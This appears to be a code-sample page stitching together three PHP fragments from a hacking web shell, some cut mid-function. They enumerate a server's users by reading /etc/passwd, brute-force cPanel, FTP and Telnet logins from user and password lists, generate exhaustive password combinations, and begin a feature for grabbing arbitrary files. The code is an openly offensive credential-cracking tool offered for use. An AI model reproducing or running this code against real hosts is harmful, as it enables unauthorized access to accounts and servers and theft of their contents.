function cpanel_crack()
{
    set_time_limit(0);
    global $os;
    echo "<div id=result>";
    $cpanel_port = "2082";
    $connect_timeout = 5;
    if (!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) {
        ?>
		<center>
		<form method=post>
		<table class=tbl>
			<tr>
				<td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
			</tr>
			<tr>
				<td align=center>User names</td><td align=center>Password</td>
			</tr>
			<tr>
				<td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php 
        if ($os != "win") {
            if (@file('/etc/passwd')) {
                $users = file('/etc/passwd');
                foreach ($users as $user) {
                    $user = explode(':', $user);
                    echo $user[0] . "\n";
                }
            } else {
                $temp = "";
                $val1 = 0;
                $val2 = 1000;
                for (; $val1 <= $val2; $val1++) {
                    $uid = @posix_getpwuid($val1);
                    if ($uid) {
                        $temp .= join(':', $uid) . "\n";
                    }
                }
                $temp = trim($temp);
                if ($file5 = fopen("test.txt", "w")) {
                    fputs($file5, $temp);
                    fclose($file5);
                    $file = fopen("test.txt", "r");
                    while (!feof($file)) {
                        $s = fgets($file);
                        $matches = array();
                        $t = preg_match('/\\/(.*?)\\:\\//s', $s, $matches);
                        $matches = str_replace("home/", "", $matches[1]);
                        if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") {
                            continue;
                        }
                        echo $matches;
                    }
                    fclose($file);
                }
            }
        }
        ?>
</textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
			</tr>
			<tr>
				<td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
			</tr>
			<tr>
				<td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
			</tr>
			<tr>
				<td align=center colspan=2><input type="submit" value="   Go    " class=but></td>
			</tr>
		</table>
		</form>
		</center>
		<?php 
    } else {
        if (empty($_POST['username']) || empty($_POST['password'])) {
            echo "<center>Please Enter The Users or Password List</center>";
        } else {
            $userlist = explode("\n", $_POST['username']);
            $passlist = explode("\n", $_POST['password']);
            if ($_POST['cracktype'] == "ftp") {
                foreach ($userlist as $user) {
                    $pureuser = trim($user);
                    foreach ($passlist as $password) {
                        $purepass = trim($password);
                        ftp_check($_POST['target'], $pureuser, $purepass, $connect_timeout);
                    }
                }
            }
            if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") {
                if ($cracktype == "telnet") {
                    $cpanel_port = "23";
                } else {
                    $cpanel_port = "2082";
                }
                foreach ($userlist as $user) {
                    $pureuser = trim($user);
                    echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>\n\t\t\t\t\t\tProcessing user {$pureuser} ...</font></b><br><br>";
                    foreach ($passlist as $password) {
                        $purepass = trim($password);
                        cpanel_check($_POST['target'], $pureuser, $purepass, $connect_timeout);
                    }
                }
            }
        }
    }
    echo "</div>";
}
Пример #2
0
 function brute()
 {
     global $vals, $min_length, $max_length;
     global $target, $pureuser, $connect_timeout;
     $min = $min_length;
     $max = $max_length;
     $A = array();
     $numVals = count($vals);
     $incDone = "";
     $realMax = "";
     $currentVal = "";
     $firstVal = "";
     for ($i = 0; $i < $max + 1; $i++) {
         $A[$i] = -1;
     }
     for ($i = 0; $i < $max; $i++) {
         $realMax = $realMax . $vals[$numVals - 1];
     }
     for ($i = 0; $i < $min; $i++) {
         $A[$i] = $vals[0];
     }
     $i = 0;
     while ($A[$i] != -1) {
         $firstVal .= $A[$i];
         $i++;
     }
     //echo $firstVal . "<br>";
     cpanel_check($target, $pureuser, $firstVal, $connect_timeout);
     while (1) {
         for ($i = 0; $i < $max + 1; $i++) {
             if ($A[$i] == -1) {
                 break;
             }
         }
         $i--;
         $incDone = 0;
         while (!$incDone) {
             for ($j = 0; $j < $numVals; $j++) {
                 if ($A[$i] == $vals[$j]) {
                     break;
                 }
             }
             if ($j == $numVals - 1) {
                 $A[$i] = $vals[0];
                 $i--;
                 if ($i < 0) {
                     for ($i = 0; $i < $max + 1; $i++) {
                         if ($A[$i] == -1) {
                             break;
                         }
                     }
                     $A[$i] = $vals[0];
                     $A[$i + 1] = -1;
                     $incDone = 1;
                     print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking<br>";
                 }
             } else {
                 $A[$i] = $vals[$j + 1];
                 $incDone = 1;
             }
         }
         $i = 0;
         $currentVal = "";
         while ($A[$i] != -1) {
             $currentVal = $currentVal . $A[$i];
             $i++;
         }
         cpanel_check($target, $pureuser, $currentVal, $connect_timeout);
         //echo $currentVal . "<br>";
         if ($currentVal == $realMax) {
             return 0;
         }
     }
 }
Пример #3
0
        }
        curl_close($ch);
    }
    if (isset($submit) && !empty($submit)) {
        $userlist = explode("\n", $users);
        $passlist = explode("\n", $pass);
        print "<b>[ user@alturks.com ]# Attacking ...</font></b><br>";
        foreach ($userlist as $user) {
            $_user = trim($user);
            foreach ($passlist as $password) {
                $_pass = trim($password);
                if ($option == "ftp") {
                    ftp_check($target, $_user, $_pass, $connect_timeout);
                }
                if ($option == "cpanel") {
                    cpanel_check($target, $_user, $_pass, $connect_timeout);
                }
            }
        }
    }
} elseif ($page == 'users') {
    echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
    echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="' . htmlspecialchars($file) . '"><input type="submit" name="hardstylez" value="grab !"></form>';
    $file = $_POST['file'];
    $level = 0;
    if (!file_exists("file:")) {
        @mkdir("file:");
    }
    @chdir("file:");
    $level++;
    $hardstyle = @explode("/", $file);